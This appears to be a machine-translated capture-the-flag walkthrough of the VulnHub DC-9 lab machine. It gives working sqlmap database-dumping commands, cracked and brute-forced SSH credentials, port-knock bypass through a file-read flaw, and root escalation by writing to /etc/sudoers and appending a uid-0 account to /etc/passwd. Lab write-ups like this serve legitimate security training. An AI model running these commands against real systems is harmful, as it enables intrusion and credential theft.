Introduce

series ： DC（ This series consists of 10 platform ）
Release date ：2019 year 12 month 29 Japan
difficulty ： intermediate
Flag： obtain root Access and read unique Flag
Study ：

• bp linkage xray scanning
• sql Inject
• Arbitrary file reading
• ssh Open door
• Raise the right

Target address ：https://www.vulnhub.com/entry/dc-9,412/
Get tips from the shooting range ：

• The target is more suitable for Virtualbox

information gathering

The host found

netdiscover The host found
about VulnHub For the target , appear “PCS Systemtechnik GmbH” It's the target .

netdiscover -i eth0 -r 192.168.1.0/24

Host information detection

Information detection ：nmap -A -p- 192.168.1.127, It's open 22( Not sure ) and 80 port

Visit website

The directory scan did not reveal any valuable information , The home page of the website is dotted , Found a pile of information . Try blasting websites

Blasting website - Failure

1. Get password book

cewl http://192.168.1.127/display.php -d 2 -w wordlist.txt

2. Blast . Did not get the account password .

Missed scanning website

I don't see any problem for the time being , Try bp linkage xray Missed scanning .

1. bp Set the top-level proxy

2. xray Turn on passive scanning

.\xray_windows_amd64.exe webscan --listen 127.0.0.1:6666 --html-output result.html

Found out sql Inject holes

Or a different perspective ：

sqlmap Inject

In the last article DC8 Manual has been introduced in sql Inject , Here is the introduction sqlmap Automatic injection ：

1. Confirm the existence of sql Inject holes ：

sqlmap -u "http://192.168.1.127/results.php" --data "search=1"

2. Get database name ：

sqlmap -u "http://192.168.1.127/results.php" --data "search=1" --dbs

3. test staff Table names in the database ：

sqlmap -u "http://192.168.1.127/results.php" --data "search=1" -D Staff --tables

4. obtain user Fields in the table ：

sqlmap -u "http://192.168.1.127/results.php" --data "search=1" -D Staff -T Users --columnssqlmap -u "http://192.168.1.127/results.php" --data "search=1" -D Staff -T Users --columns

5. get data

sqlmap -u "http://192.168.1.127/results.php" --data "search=1" -D Staff -T Users -C "UserID,Username,Password" --dump

6. md5 Collision ：https://www.somd5.com/

Get the code ：transorbital1

Empathy , You can get the contents of another database ：

sqlmap -u "http://192.168.1.127/results.php" --data "search=1" -D users -T UserDetails -C username,password --dump

Arbitrary file read vulnerability

Using the account ：admin, password ：transorbital1 After logging into the website , See the prompt at the bottom left corner of the website that the file does not exist

Have a try , Do exist . however , What will happen next ？

Read the related articles on the Internet , It can only be said , I didn't think so .
adopt /proc/sched_debug Check it out. Linux The scheduling of tasks in the system

Found out Knockd. It has been introduced in previous articles ：https://www.yuque.com/u1881995/xwfvho/emg3of#fhrny
Read down knockd Configuration file for ：/etc/knockd.conf, get ssh The password to open the door ：7469,8475,9842

Turn on SSH port

apt install knockd
nmap -sV 192.168.1.127 -p 22

SSH Blast

web This is the end of the infiltration of , Next you need to try SSH Blast . Adopted above users Database see UserDetails Data present in the table . Now try to use this data to explode SSH

[22][ssh] host: 192.168.1.127   login: chandlerb   	password: UrAG0D!
[22][ssh] host: 192.168.1.127   login: joeyt   			password: Passw0rd
[22][ssh] host: 192.168.1.127   login: janitor   		password: Ilovepeepee

information gathering

Try to log in with different accounts , First, I found that there were many users on the target plane , Then I didn't find any interesting files , Consider using another account to continue logging in , See if you can see anything interesting .

When we use janitor When the user logs in , Found some new password information . It seems that secondary blasting is needed

secondary SSH Blast

Re create a codebook , To save the above password , To speed up the blasting

Get a new account password ：

[22][ssh] host: 192.168.1.127   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.1.127   login: fredf   password: B4-Tru3-001

When we use fredf I found sensitive information when I logged in as

View its file contents , Checked ,/opt/devstuff/test.py It should be the target file . It is found that this is an additional script .

The way to raise the right 1

Go to /etc/sudoers Add content , So that users can root To execute a command . establish /dev/shm/sudoerAdd, The contents are as follows ：

joeyt ALL=(ALL) ALL

And then execute

sudo /opt/devstuff/dist/test/test /dev/shm/sudoerAdd /etc/sudoers

Finally, switch the identity to joeyt Right can be raised

The way to raise the right 2

Add a new user to /etc/passwd, Then the newly added user logs in .

1. adopt OpenSSL passwd Generate a new user hacker, The password for hack123

openssl passwd -1 -salt hack hack123

2. Make it up hack User /etc/passwd The content of

hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0:root:/root:/bin/bash

3. With the help of /opt/devstuff/dist/test/test Raise the right

echo 'hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0:root:/root:/bin/bash' >> dc9pass
sudo /opt/devstuff/dist/test/test dc9pass /etc/passwd

Reference resources

【Vulnhub】DC9